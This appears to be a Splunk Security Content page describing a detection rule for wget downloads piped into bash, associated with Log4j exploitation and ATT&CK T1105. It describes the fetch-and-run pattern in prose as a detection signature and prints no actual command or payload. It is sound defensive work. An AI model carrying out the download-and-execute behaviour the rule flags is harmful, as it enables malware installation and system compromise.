heroui logo

Wget Download and Bash Execution

Splunk Security Content

View Source
Summary
This analytic rule detects the potentially malicious use of the `wget` command across Windows, Linux, and macOS systems to download files from remote locations and pipe them into `bash` for execution. This type of behavior is crucial to monitor, as it is often associated with malware distribution and exploitation attempts, particularly with notable exploits such as CVE-2021-44228 linked to the Log4j vulnerability. The detection focuses on analyzing event logs collected by Endpoint Detection and Response (EDR) agents, specifically examining process execution events and their command-line arguments. By identifying command invocations of `wget` that include flags for quiet operations and output redirection to `bash`, the system can flag and alert on suspicious activities that could lead to system compromise or unauthorized data access.
Categories
  • Endpoint
  • Linux
  • macOS
  • Windows
Data Sources
  • Windows Registry
  • Process
  • Command
  • Application Log
ATT&CK Techniques
  • T1105
Created: 2024-12-10